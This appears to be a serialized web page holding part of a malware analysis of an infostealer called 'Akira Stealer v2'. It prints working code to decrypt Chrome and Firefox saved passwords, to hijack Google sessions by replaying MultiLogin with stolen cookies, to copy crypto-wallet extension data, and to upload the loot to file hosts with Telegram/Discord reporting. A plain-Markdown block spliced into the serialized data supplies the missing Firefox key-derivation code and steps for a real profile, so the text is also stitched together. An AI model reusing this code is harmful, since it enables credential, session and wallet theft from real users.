tag)\n",[63,14776,14777,14782,14787,14792,14797],{"__ignoreMap":65},[102,14778,14779],{"class":104,"line":105},[102,14780,14781],{},"nonce = value[3:15]\n",[102,14783,14784],{"class":104,"line":111},[102,14785,14786],{},"ciphertext = value[15:-16]\n",[102,14788,14789],{"class":104,"line":329},[102,14790,14791],{},"tag = value[-16:]\n",[102,14793,14794],{"class":104,"line":346},[102,14795,14796],{},"cipher = AES.new(aes_key, AES.MODE_GCM, nonce=nonce)\n",[102,14798,14799],{"class":104,"line":650},[102,14800,14801],{},"decrypted = cipher.decrypt_and_verify(ciphertext, tag)\n",[12,14803,14804,14805,1013],{},"If fallback to DPAPI is needed (on older systems), it uses ",[63,14806,14807],{},"win32crypt.CryptUnprotectData()",[12,14809,14810,14816],{},[251,14811,14812,14813,1550],{},"Explanation of ",[63,14814,14815],{},"decrypt_password_blob","\nThis function demonstrates how Akira Stealer decrypts each saved password value from Chromium-based browsers. It handles two cases:",[3259,14818,14819,14829],{},[1257,14820,14821,14824,14825,14828],{},[251,14822,14823],{},"Windows DPAPI blobs"," (older or non-GCM encrypted data): Falls back to the system call ",[63,14826,14827],{},"CryptUnprotectData",", which uses the user’s Windows credentials to decrypt.",[1257,14830,14831,14834,14835,14838],{},[251,14832,14833],{},"AES-GCM encrypted blobs"," (Chrome v10/v11 format): Parses the version header, extracts the IV and authentication tag, and uses the ",[63,14836,14837],{},"cryptography"," library to decrypt the payload securely.",[56,14840,14842],{"className":12155,"code":14841,"language":12157,"meta":65,"style":65},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\n\n\ndef decrypt_password_blob(buffer: bytes, key: bytes) -> str:\n    \"\"\"\n    Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n\n    Parameters:\n    - buffer: raw encrypted blob from the `password_value` field\n    - 
key: the master AES key retrieved via DPAPI from Local State\n\n    Returns:\n    - Decrypted UTF-8 plaintext password\n    \"\"\"\n    # 1) DPAPI fallback for non-AES-GCM blobs\n    if not buffer.startswith((b'v10', b'v11')):\n        # Uses Windows CryptUnprotectData under the hood\n        return CryptUnprotectData(buffer)\n\n    # 2) AES-GCM decryption for Chrome v10/v11 format:\n    # Bytes layout:\n    # [0:3]    = version header ('v10'/'v11')\n    # [3:15]   = initialization vector (IV)\n    # [15:-16] = ciphertext payload\n    # [-16:]   = GCM authentication tag\n    iv = buffer[3:15]\n    ciphertext = buffer[15:-16]\n    tag = buffer[-16:]\n\n    # Initialize AES-GCM cipher with extracted IV and tag\n    cipher = Cipher(\n        algorithms.AES(key),\n        modes.GCM(iv, tag),\n        backend=default_backend()\n    )\n    decryptor = cipher.decryptor()\n\n    # Perform decryption; raises if authentication fails\n    plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n\n    # Decode to UTF-8, ignoring any stray errors\n    return plaintext.decode('utf-8', errors='ignore')\n",[63,14843,14844,14849,14854,14858,14862,14867,14871,14876,14880,14885,14890,14895,14899,14904,14909,14913,14918,14923,14928,14933,14937,14942,14947,14952,14957,14962,14967,14972,14977,14982,14986,14991,14996,15001,15006,15011,15015,15020,15024,15029,15034,15038,15043],{"__ignoreMap":65},[102,14845,14846],{"class":104,"line":105},[102,14847,14848],{},"from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\n",[102,14850,14851],{"class":104,"line":111},[102,14852,14853],{},"from cryptography.hazmat.backends import default_backend\n",[102,14855,14856],{"class":104,"line":329},[102,14857,11519],{"emptyLinePlaceholder":2181},[102,14859,14860],{"class":104,"line":346},[102,14861,11519],{"emptyLinePlaceholder":2181},[102,14863,14864],{"class":104,"line":650},[102,14865,14866],{},"def decrypt_password_blob(buffer: bytes, key: bytes) -> 
str:\n",[102,14868,14869],{"class":104,"line":656},[102,14870,13496],{},[102,14872,14873],{"class":104,"line":662},[102,14874,14875],{},"    Decrypts a Chrome password blob using either DPAPI or AES-GCM.\n",[102,14877,14878],{"class":104,"line":668},[102,14879,11519],{"emptyLinePlaceholder":2181},[102,14881,14882],{"class":104,"line":674},[102,14883,14884],{},"    Parameters:\n",[102,14886,14887],{"class":104,"line":680},[102,14888,14889],{},"    - buffer: raw encrypted blob from the `password_value` field\n",[102,14891,14892],{"class":104,"line":12692},[102,14893,14894],{},"    - key: the master AES key retrieved via DPAPI from Local State\n",[102,14896,14897],{"class":104,"line":12698},[102,14898,11519],{"emptyLinePlaceholder":2181},[102,14900,14901],{"class":104,"line":12704},[102,14902,14903],{},"    Returns:\n",[102,14905,14906],{"class":104,"line":12710},[102,14907,14908],{},"    - Decrypted UTF-8 plaintext password\n",[102,14910,14911],{"class":104,"line":12716},[102,14912,13496],{},[102,14914,14915],{"class":104,"line":12722},[102,14916,14917],{},"    # 1) DPAPI fallback for non-AES-GCM blobs\n",[102,14919,14920],{"class":104,"line":12728},[102,14921,14922],{},"    if not buffer.startswith((b'v10', b'v11')):\n",[102,14924,14925],{"class":104,"line":12734},[102,14926,14927],{},"        # Uses Windows CryptUnprotectData under the hood\n",[102,14929,14930],{"class":104,"line":12740},[102,14931,14932],{},"        return CryptUnprotectData(buffer)\n",[102,14934,14935],{"class":104,"line":12746},[102,14936,11519],{"emptyLinePlaceholder":2181},[102,14938,14939],{"class":104,"line":12752},[102,14940,14941],{},"    # 2) AES-GCM decryption for Chrome v10/v11 format:\n",[102,14943,14944],{"class":104,"line":12758},[102,14945,14946],{},"    # Bytes layout:\n",[102,14948,14949],{"class":104,"line":12764},[102,14950,14951],{},"    # [0:3]    = version header ('v10'/'v11')\n",[102,14953,14954],{"class":104,"line":12770},[102,14955,14956],{},"    # [3:15]   = 
initialization vector (IV)\n",[102,14958,14959],{"class":104,"line":12776},[102,14960,14961],{},"    # [15:-16] = ciphertext payload\n",[102,14963,14964],{"class":104,"line":13442},[102,14965,14966],{},"    # [-16:]   = GCM authentication tag\n",[102,14968,14969],{"class":104,"line":13447},[102,14970,14971],{},"    iv = buffer[3:15]\n",[102,14973,14974],{"class":104,"line":13452},[102,14975,14976],{},"    ciphertext = buffer[15:-16]\n",[102,14978,14979],{"class":104,"line":13457},[102,14980,14981],{},"    tag = buffer[-16:]\n",[102,14983,14984],{"class":104,"line":13463},[102,14985,11519],{"emptyLinePlaceholder":2181},[102,14987,14988],{"class":104,"line":13468},[102,14989,14990],{},"    # Initialize AES-GCM cipher with extracted IV and tag\n",[102,14992,14993],{"class":104,"line":13473},[102,14994,14995],{},"    cipher = Cipher(\n",[102,14997,14998],{"class":104,"line":13478},[102,14999,15000],{},"        algorithms.AES(key),\n",[102,15002,15003],{"class":104,"line":13483},[102,15004,15005],{},"        modes.GCM(iv, tag),\n",[102,15007,15008],{"class":104,"line":13488},[102,15009,15010],{},"        backend=default_backend()\n",[102,15012,15013],{"class":104,"line":13493},[102,15014,13622],{},[102,15016,15017],{"class":104,"line":13499},[102,15018,15019],{},"    decryptor = cipher.decryptor()\n",[102,15021,15022],{"class":104,"line":13505},[102,15023,11519],{"emptyLinePlaceholder":2181},[102,15025,15026],{"class":104,"line":13511},[102,15027,15028],{},"    # Perform decryption; raises if authentication fails\n",[102,15030,15031],{"class":104,"line":13516},[102,15032,15033],{},"    plaintext = decryptor.update(ciphertext) + decryptor.finalize()\n",[102,15035,15036],{"class":104,"line":13521},[102,15037,11519],{"emptyLinePlaceholder":2181},[102,15039,15040],{"class":104,"line":13526},[102,15041,15042],{},"    # Decode to UTF-8, ignoring any stray errors\n",[102,15044,15045],{"class":104,"line":13531},[102,15046,15047],{},"    return plaintext.decode('utf-8', 
errors='ignore')\n",[41,15049,15051],{"id":15050},"_76-session-token-hijacking","7.6 Session Token Hijacking",[12,15053,47],{},[12,15055,15056,15057,15060],{},"Akira doesn’t stop at passive data collection—it actively hijacks live session tokens to impersonate victims in real time. After extracting encrypted tokens from browser storage, it reconstructs the required authorization header and replays a ",[251,15058,15059],{},"MultiLogin"," request against Google’s OAuth endpoint. The code snippet below illustrates this process:",[56,15062,15064],{"className":12155,"code":15063,"language":12157,"meta":65,"style":65},"# Build SAPISIDHASH header for Google services\norigin = \"https://accounts.google.com\"\ntimestamp = int(time.time())\n# Compute SHA1 of \"timestamp origin SAPISID\"\npayload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\nsignature = hashlib.sha1(payload).hexdigest()\nheaders = {\n    \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n    \"Content-Type\": \"application/json\"\n}\n# Replay MultiLogin to fetch valid session cookies\nresponse = requests.post(\n    \"https://accounts.google.com/accounts/multilogin\",\n    headers=headers,\n    json={\"continue\": \"https://mail.google.com\"}\n)\nif response.status_code == 200:\n    # Victim’s cookies now present in response.cookies\n    hijacked_cookies = response.cookies\n",[63,15065,15066,15071,15076,15081,15086,15091,15096,15101,15106,15111,15115,15120,15125,15130,15135,15140,15144,15149,15154],{"__ignoreMap":65},[102,15067,15068],{"class":104,"line":105},[102,15069,15070],{},"# Build SAPISIDHASH header for Google services\n",[102,15072,15073],{"class":104,"line":111},[102,15074,15075],{},"origin = \"https://accounts.google.com\"\n",[102,15077,15078],{"class":104,"line":329},[102,15079,15080],{},"timestamp = int(time.time())\n",[102,15082,15083],{"class":104,"line":346},[102,15084,15085],{},"# Compute SHA1 of \"timestamp origin 
SAPISID\"\n",[102,15087,15088],{"class":104,"line":650},[102,15089,15090],{},"payload = f\"{timestamp} {origin} {sap_id_cookie}\".encode()\n",[102,15092,15093],{"class":104,"line":656},[102,15094,15095],{},"signature = hashlib.sha1(payload).hexdigest()\n",[102,15097,15098],{"class":104,"line":662},[102,15099,15100],{},"headers = {\n",[102,15102,15103],{"class":104,"line":668},[102,15104,15105],{},"    \"Authorization\": f\"SAPISIDHASH {timestamp}_{signature}\",\n",[102,15107,15108],{"class":104,"line":674},[102,15109,15110],{},"    \"Content-Type\": \"application/json\"\n",[102,15112,15113],{"class":104,"line":680},[102,15114,10086],{},[102,15116,15117],{"class":104,"line":12692},[102,15118,15119],{},"# Replay MultiLogin to fetch valid session cookies\n",[102,15121,15122],{"class":104,"line":12698},[102,15123,15124],{},"response = requests.post(\n",[102,15126,15127],{"class":104,"line":12704},[102,15128,15129],{},"    \"https://accounts.google.com/accounts/multilogin\",\n",[102,15131,15132],{"class":104,"line":12710},[102,15133,15134],{},"    headers=headers,\n",[102,15136,15137],{"class":104,"line":12716},[102,15138,15139],{},"    json={\"continue\": \"https://mail.google.com\"}\n",[102,15141,15142],{"class":104,"line":12722},[102,15143,12911],{},[102,15145,15146],{"class":104,"line":12728},[102,15147,15148],{},"if response.status_code == 200:\n",[102,15150,15151],{"class":104,"line":12734},[102,15152,15153],{},"    # Victim’s cookies now present in response.cookies\n",[102,15155,15156],{"class":104,"line":12740},[102,15157,15158],{},"    hijacked_cookies = response.cookies\n",[12,15160,15161],{},"By replaying this request, Akira can impersonate the user’s Gmail, Drive, or any other Google service protected by a valid session—no credentials required. 
This technique leverages Google’s own token acceptance logic, making it nearly indistinguishable from legitimate client behavior.",[41,15163,15165],{"id":15164},"_77-firefox-decryption","7.7 Firefox Decryption",[12,15167,47],{},[12,15169,15170,15171,15174],{},"Gecko‑based browsers like Firefox encrypt saved credentials and cookies using a master key stored in ",[63,15172,15173],{},"key4.db",". Akira includes a stripped‑down decryption routine mirroring Mozilla’s NSS logic, handling both 3DES and AES‑CBC variants without triggering the master password prompt. Example usage:",[56,15176,15178],{"className":12155,"code":15177,"language":12157,"meta":65,"style":65},"# Load global Salt and encrypted item from key4.db\ndb = sqlite3.connect(profile_path + \"/key4.db\")\ncursor = db.cursor()\ncursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 'password'\")\nglobal_salt, item2 = cursor.fetchone()\n\n# Decode DER structure and derive key\ndecoded, _ = der_decode(item2)\nentry_salt = decoded[0][1][0].asOctets()\ncipher_text = decoded[1].asOctets()\n# Derive 3DES key\nkey = derive_3des_key(global_salt, master_password, entry_salt)\niv = decoded[0][1][1].asOctets()\n# Decrypt credentials\ncipher = DES3.new(key, DES3.MODE_CBC, iv)\nclear_password = unpad(cipher.decrypt(cipher_text))\n\nprint(\"Decrypted Firefox password:\", clear_password)\n",[63,15179,15180,15185,15190,15195,15200,15205,15209,15214,15219,15224,15229,15234,15239,15244,15249,15254,15259,15263],{"__ignoreMap":65},[102,15181,15182],{"class":104,"line":105},[102,15183,15184],{},"# Load global Salt and encrypted item from key4.db\n",[102,15186,15187],{"class":104,"line":111},[102,15188,15189],{},"db = sqlite3.connect(profile_path + \"/key4.db\")\n",[102,15191,15192],{"class":104,"line":329},[102,15193,15194],{},"cursor = db.cursor()\n",[102,15196,15197],{"class":104,"line":346},[102,15198,15199],{},"cursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 
'password'\")\n",[102,15201,15202],{"class":104,"line":650},[102,15203,15204],{},"global_salt, item2 = cursor.fetchone()\n",[102,15206,15207],{"class":104,"line":656},[102,15208,11519],{"emptyLinePlaceholder":2181},[102,15210,15211],{"class":104,"line":662},[102,15212,15213],{},"# Decode DER structure and derive key\n",[102,15215,15216],{"class":104,"line":668},[102,15217,15218],{},"decoded, _ = der_decode(item2)\n",[102,15220,15221],{"class":104,"line":674},[102,15222,15223],{},"entry_salt = decoded[0][1][0].asOctets()\n",[102,15225,15226],{"class":104,"line":680},[102,15227,15228],{},"cipher_text = decoded[1].asOctets()\n",[102,15230,15231],{"class":104,"line":12692},[102,15232,15233],{},"# Derive 3DES key\n",[102,15235,15236],{"class":104,"line":12698},[102,15237,15238],{},"key = derive_3des_key(global_salt, master_password, entry_salt)\n",[102,15240,15241],{"class":104,"line":12704},[102,15242,15243],{},"iv = decoded[0][1][1].asOctets()\n",[102,15245,15246],{"class":104,"line":12710},[102,15247,15248],{},"# Decrypt credentials\n",[102,15250,15251],{"class":104,"line":12716},[102,15252,15253],{},"cipher = DES3.new(key, DES3.MODE_CBC, iv)\n",[102,15255,15256],{"class":104,"line":12722},[102,15257,15258],{},"clear_password = unpad(cipher.decrypt(cipher_text))\n",[102,15260,15261],{"class":104,"line":12728},[102,15262,11519],{"emptyLinePlaceholder":2181},[102,15264,15265],{"class":104,"line":12734},[102,15266,15267],{},"print(\"Decrypted Firefox password:\", clear_password)\n",[12,15269,15270,15271,805,15273,9866,15275,15277],{},"With this routine, Akira can transparently dump ",[63,15272,14669],{},[63,15274,14672],{},[63,15276,14675],{}," for each Firefox profile, writing the decrypted output to:",[56,15279,15282],{"className":15280,"code":15281,"language":61},[59],"Passwords/Firefox_\u003CProfileName> Passwords.txt\nCookies/Firefox_\u003CProfileName> Cookies.txt\nHistory/Firefox_\u003CProfileName> 
History.txt\n",[63,15283,15281],{"__ignoreMap":65},[12,15285,15286],{},"Because the routine never goes through the browser, no master password prompt is shown. In the default configuration (no master password set) the key schedule runs with an empty password and every stored login decrypts; if the user has set a master password, the same code needs that password, which the stealer does not have.",[12,15288,15289],{},[251,15290,15291],{},"4. File Structure & Naming",[56,15293,15296],{"className":15294,"code":15295,"language":61,"meta":65},[59],"\u003CComputerName>.zip\n└── \u003CComputerName>\\\n    ├── Passwords\\\n    │   ├── Chrome Passwords.txt\n    │   ├── Edge Passwords.txt\n    │   └── …\n    ├── Cookies\\\n    │   ├── Chrome Cookies.txt\n    │   ├── Edge Cookies.txt\n    │   ├── user@example.com Google Session.txt\n    │   └── …\n    ├── CreditCards\\\n    │   ├── Chrome CreditCards.txt\n    │   └── …\n    ├── History\\\n    │   ├── Chrome History.txt\n    │   └── …\n    ├── Autofill\\\n    │   ├── Chrome Autofill.txt\n    │   └── …\n    └── Wallets\\\n        ├── Firefox_Default_profiles.zip\n        ├── Firefox_Profile1_profiles.zip\n        └── …\n",[63,15297,15295],{"__ignoreMap":65},[1254,15299,15300,15314,15320],{},[1257,15301,15302,15303,15306,15307,15310,15311,7224],{},"Each ",[63,15304,15305],{},".txt"," begins with a consistent header (",[63,15308,15309],{},"\u003C================[Akira Stealer v2]>================>",") and separator line (",[63,15312,15313],{},"====…====",[1257,15315,15316,15317,1013],{},"On‑disk ZIP: ",[63,15318,15319],{},"%TEMP%\\\u003CComputerName>.zip",[1257,15321,15322,15323,1013],{},"C&C filename label: ",[63,15324,15325],{},"Akira-\u003Cusername>.zip",[12,15327,15328],{},[251,15329,15330],{},"5. 
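The `der_decode` and `derive_3des_key` helpers in the Firefox snippet of section 7.7 are left undefined. What follows is an added example, written for this page and not code from the post or from the stealer, that shows with the standard library only what those two steps do: a minimal DER reader for the `metadata` row of `key4.db`, the NSS key schedule for the legacy 3DES scheme (which yields the IV as well as the key; the INTEGER after the salt is the iteration count), and a constructed `item2` blob to run them against. `der_parse`, `unpack_item2`, `nss_3des_key_iv` and the `der_encode`/`oid_encode`/`build_sample_item2` builders are this example's own names. The 3DES decryption itself needs a cipher implementation (the snippet uses `DES3` from pycryptodome) and is not repeated here; note that the `password` row only yields the password-check marker, while the key that unwraps `logins.json` entries sits in the `nssPrivate` table and goes through the same routine.

```python
import hashlib
import hmac

PBE_SHA1_3DES = "1.2.840.113549.1.12.5.1.3"   # pbeWithSHA1AndTripleDES-CBC, the legacy key4.db scheme


def der_parse(buf, pos=0):
    """Minimal DER reader covering the types found in key4.db's metadata row.
    Returns (value, next_pos): SEQUENCE -> list, OCTET STRING -> bytes,
    INTEGER -> int, OBJECT IDENTIFIER -> dotted string."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                    # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    body, end = buf[pos:pos + length], pos + length
    if tag == 0x30:                                      # SEQUENCE
        items, p = [], 0
        while p < len(body):
            item, p = der_parse(body, p)
            items.append(item)
        return items, end
    if tag == 0x04:                                      # OCTET STRING
        return body, end
    if tag == 0x02:                                      # INTEGER
        return int.from_bytes(body, "big", signed=True), end
    if tag == 0x06:                                      # OBJECT IDENTIFIER
        arcs, val = [body[0] // 40, body[0] % 40], 0
        for b in body[1:]:
            val = (val << 7) | (b & 0x7F)
            if not b & 0x80:
                arcs.append(val)
                val = 0
        return ".".join(map(str, arcs)), end
    raise ValueError(f"unsupported DER tag 0x{tag:02x}")


def unpack_item2(item2):
    """metadata.item2 is SEQUENCE { SEQUENCE { OID, SEQUENCE { salt, iterations } }, ciphertext }."""
    (oid, (entry_salt, iterations)), cipher_text = der_parse(item2)[0]
    return oid, entry_salt, iterations, cipher_text


def nss_3des_key_iv(global_salt, master_password, entry_salt):
    """NSS key schedule for the 3DES scheme: the 24-byte key and the 8-byte IV
    both come out of the derived material; nothing in the DER supplies an IV.
    master_password is b"" when the profile has no master password set."""
    hp = hashlib.sha1(global_salt + master_password).digest()
    pes = entry_salt + b"\x00" * (20 - len(entry_salt))
    chp = hashlib.sha1(hp + entry_salt).digest()
    k1 = hmac.new(chp, pes + entry_salt, hashlib.sha1).digest()
    tk = hmac.new(chp, pes, hashlib.sha1).digest()
    k2 = hmac.new(chp, tk + entry_salt, hashlib.sha1).digest()
    k = k1 + k2
    return k[:24], k[-8:]


# --- builders for a constructed sample item2 (not taken from a real profile) ---
def der_encode(tag, body):
    if len(body) < 0x80:
        return bytes([tag, len(body)]) + body
    lb = len(body).to_bytes((len(body).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + body


def oid_encode(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out.extend(reversed(chunk))
    return bytes(out)


def build_sample_item2(entry_salt, cipher_text):
    """Assemble a metadata.item2 blob with the 3DES OID, laid out as key4.db stores it."""
    params = der_encode(0x30, der_encode(0x04, entry_salt) + der_encode(0x02, b"\x01"))
    algo = der_encode(0x30, der_encode(0x06, oid_encode(PBE_SHA1_3DES)) + params)
    return der_encode(0x30, algo + der_encode(0x04, cipher_text))


if __name__ == "__main__":
    item2 = build_sample_item2(b"S" * 20, bytes(200))       # constructed salt and ciphertext
    oid, salt, iters, ct = unpack_item2(item2)
    key, iv = nss_3des_key_iv(b"G" * 20, b"", salt)         # b"" = no master password
    print(oid, iters, len(ct), key.hex(), iv.hex())
```

Feeding a real profile means reading `item1` (global salt) and `item2` from `metadata` exactly as the snippet does, passing the bytes to `unpack_item2`, and, when the OID is the PBES2 one instead, switching to PBKDF2-HMAC-SHA256 and AES-CBC with the IV that the PBES2 parameters do carry.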
Exfiltration & Cleanup",[56,15332,15334],{"className":12155,"code":15333,"language":12157,"meta":65,"style":65},"url = Webhook.uploadToGofile(zip_path)\nif not url:\n    url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\nWebhook.sendDataTG(zip_path, chatId, startup)\nUtils.clear_client_folder()\n",[63,15335,15336,15341,15346,15351,15356],{"__ignoreMap":65},[102,15337,15338],{"class":104,"line":105},[102,15339,15340],{},"url = Webhook.uploadToGofile(zip_path)\n",[102,15342,15343],{"class":104,"line":111},[102,15344,15345],{},"if not url:\n",[102,15347,15348],{"class":104,"line":329},[102,15349,15350],{},"    url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[102,15352,15353],{"class":104,"line":346},[102,15354,15355],{},"Webhook.sendDataTG(zip_path, chatId, startup)\n",[102,15357,15358],{"class":104,"line":650},[102,15359,15360],{},"Utils.clear_client_folder()\n",[1254,15362,15363,15373,15387,15404],{},[1257,15364,15365,15368,15369,15372],{},[251,15366,15367],{},"Primary Channel (GoFile.io):"," The malware first attempts to upload the ZIP archive containing all stolen artifacts to GoFile.io, parsing the JSON response for a ",[63,15370,15371],{},"downloadPage"," URL that grants the attacker direct access to the archive.",[1257,15374,15375,15378,15379,15382,15383,15386],{},[251,15376,15377],{},"Automatic Fallbacks:"," Should the GoFile endpoint fail (network timeout, rate limit, etc.), the code seamlessly falls back to ",[63,15380,15381],{},"file.io",", and if that too returns an empty link, finally to ",[63,15384,15385],{},"oshi.at",". 
Both alternatives are invoked without raising exceptions, ensuring that one of the three services will always be tried in succession.",[1257,15388,15389,15392,15393,15396,15397,805,15400,15403],{},[251,15390,15391],{},"Webhook Reporting:"," Once a URL (or an empty string on persistent failure) is determined, ",[63,15394,15395],{},"Webhook.sendDataTG(...)"," is called, packaging together the download link, machine identifiers (",[63,15398,15399],{},"chatId",[63,15401,15402],{},"startup"," flag) and all category counts (passwords, cookies, autofills, wallets) into a single Discord or Telegram message.",[1257,15405,15406,15409,15410,15413],{},[251,15407,15408],{},"Immediate Cleanup:"," After reporting, ",[63,15411,15412],{},"Utils.clear_client_folder()"," recursively deletes the entire temporary workspace and the ZIP file itself, leaving no trace of the harvested data or the archive on disk.",[2110,15415,15416,15421],{},[12,15417,15418],{},[251,15419,15420],{},"Failure Resilience:",[1254,15422,15423,15430],{},[1257,15424,15425,15426,15429],{},"All upload routines return ",[63,15427,15428],{},"\"\""," on failure instead of throwing, guaranteeing the code flow continues.",[1257,15431,15432],{},"Even if every service is unreachable, the malware still transmits a webhook report (albeit with a missing link) before erasing local artifacts, minimizing forensic remnants unless the process crashes unexpectedly.",[52,15434],{"className":15435},[8535,8536],[12,15437,15438],{},[251,15439,15440],{},"6. Robustness & Error Handling",[1254,15442,15443,15461,15467,15476],{},[1257,15444,15445,15448,15449,15452,15453,15456,15457,15460],{},[251,15446,15447],{},"Granular Exception Handling:"," Every file system interaction—be it ",[63,15450,15451],{},"shutil.copy",", SQLite queries, or ZIP operations—is wrapped in ",[63,15454,15455],{},"try/except"," blocks. 
When an error occurs (locked DB, permission denied, malformed record), the exception is caught and logged via ",[63,15458,15459],{},"Akira.logErrorTg()",", and execution continues, isolating the failure to that specific file or module.",[1257,15462,15463,15466],{},[251,15464,15465],{},"Threaded Isolation per Browser:"," The extraction routines for each supported browser run in their own thread. This multi-threaded design ensures that a crash or deadlock in one browser’s extraction (e.g., corrupt profile, missing key) does not halt or delay the analysis of other browsers.",[1257,15468,15469,15472,15473,15475],{},[251,15470,15471],{},"Silent Fallbacks & Defaults:"," Many auxiliary routines, such as uploading to alternate file hosts, checking remote resources, or spawning subprocesses, employ nested ",[63,15474,15455],{}," without surface-level alerts—maximizing stealth. Default values (empty strings, booleans) are chosen to keep the flow uninterrupted and remove obvious error conditions.",[1257,15477,15478,15481,15482,15485,15486,15489],{},[251,15479,15480],{},"Mutex & Startup Guards:"," A named mutex (",[63,15483,15484],{},"1qsMlseJplTlArIF14f",") prevents multiple instances, while registry checks and ",[63,15487,15488],{},"Utils.CreateMutex()"," protect against concurrent runs, providing additional stability during real-world deployment.",[41,15491,15493],{"id":15492},"_78-wallet-and-token-exfiltration","7.8 Wallet and Token Exfiltration",[12,15495,47],{},[12,15497,15498],{},"In this phase, Akira Stealer v2 performs the most comprehensive sweep for cryptocurrency credentials and session tokens, spanning browser extensions, desktop wallets, messaging tokens, and live keylogging. It executes in parallel threads, ensuring no vector is missed. 
Below is a step-by-step, code-backed deep dive.",[186,15500,15502],{"id":15501},"_781-browser-extension-wallets","7.8.1 Browser Extension Wallets",[12,15504,192],{},[12,15506,15507,15510],{},[251,15508,15509],{},"Targets:"," Over 80 extensions across popular browsers, including MetaMask, Phantom, Trust Wallet, Coinbase Wallet, Solflare, Exodus, Binance Chain Wallet, Keplr, Nami, TronLink, Rabby, Talisman, and more.",[56,15512,15514],{"className":12155,"code":15513,"language":12157,"meta":65,"style":65},"# Hardcoded list of extension IDs and human-friendly names\nwalletsExtensions = [\n    [\"MetaMask\",        \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n    [\"Phantom\",         \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n    [\"TrustWallet\",     \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n    [\"CoinbaseWallet\",  \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n    [\"Solflare\",        \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n    [\"BinanceChain\",    \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n    [\"Keplr\",           \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n    [\"Nami\",            \"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n    [\"Talisman\",        \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n    [\"TronLink\",        \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n    # ... 
plus dozens more mapped in code\n]\n# Extraction loop for each browser profile\nfor browser_name, (user_data, proc_name) in paths.items():\n    base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n    for ext_name, ext_id in walletsExtensions:\n        src = os.path.join(base, ext_id)\n        if os.path.isdir(src):\n            dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n            shutil.copytree(src, dest, dirs_exist_ok=True)\n            data.ext_wallets_count += 1\n",[63,15515,15516,15521,15526,15531,15536,15541,15546,15551,15556,15561,15566,15571,15576,15581,15586,15591,15596,15601,15606,15611,15616,15621,15626],{"__ignoreMap":65},[102,15517,15518],{"class":104,"line":105},[102,15519,15520],{},"# Hardcoded list of extension IDs and human-friendly names\n",[102,15522,15523],{"class":104,"line":111},[102,15524,15525],{},"walletsExtensions = [\n",[102,15527,15528],{"class":104,"line":329},[102,15529,15530],{},"    [\"MetaMask\",        \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n",[102,15532,15533],{"class":104,"line":346},[102,15534,15535],{},"    [\"Phantom\",         \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n",[102,15537,15538],{"class":104,"line":650},[102,15539,15540],{},"    [\"TrustWallet\",     \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n",[102,15542,15543],{"class":104,"line":656},[102,15544,15545],{},"    [\"CoinbaseWallet\",  \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n",[102,15547,15548],{"class":104,"line":662},[102,15549,15550],{},"    [\"Solflare\",        \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n",[102,15552,15553],{"class":104,"line":668},[102,15554,15555],{},"    [\"BinanceChain\",    \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n",[102,15557,15558],{"class":104,"line":674},[102,15559,15560],{},"    [\"Keplr\",           \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n",[102,15562,15563],{"class":104,"line":680},[102,15564,15565],{},"    [\"Nami\",            
\"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n",[102,15567,15568],{"class":104,"line":12692},[102,15569,15570],{},"    [\"Talisman\",        \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n",[102,15572,15573],{"class":104,"line":12698},[102,15574,15575],{},"    [\"TronLink\",        \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n",[102,15577,15578],{"class":104,"line":12704},[102,15579,15580],{},"    # ... plus dozens more mapped in code\n",[102,15582,15583],{"class":104,"line":12710},[102,15584,15585],{},"]\n",[102,15587,15588],{"class":104,"line":12716},[102,15589,15590],{},"# Extraction loop for each browser profile\n",[102,15592,15593],{"class":104,"line":12722},[102,15594,15595],{},"for browser_name, (user_data, proc_name) in paths.items():\n",[102,15597,15598],{"class":104,"line":12728},[102,15599,15600],{},"    base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n",[102,15602,15603],{"class":104,"line":12734},[102,15604,15605],{},"    for ext_name, ext_id in walletsExtensions:\n",[102,15607,15608],{"class":104,"line":12740},[102,15609,15610],{},"        src = os.path.join(base, ext_id)\n",[102,15612,15613],{"class":104,"line":12746},[102,15614,15615],{},"        if os.path.isdir(src):\n",[102,15617,15618],{"class":104,"line":12752},[102,15619,15620],{},"            dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", 